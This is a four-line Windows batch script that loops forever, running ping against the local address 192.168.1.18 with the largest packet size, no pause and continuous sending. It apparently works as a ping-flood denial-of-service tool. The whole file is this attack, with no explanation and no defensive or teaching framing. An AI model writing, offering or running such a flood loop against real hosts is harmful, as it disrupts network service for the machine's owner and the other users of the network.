@echo off
:start
ping 192.168.1.18 -a -l 65500 -w 1 -t -n 65500
goto start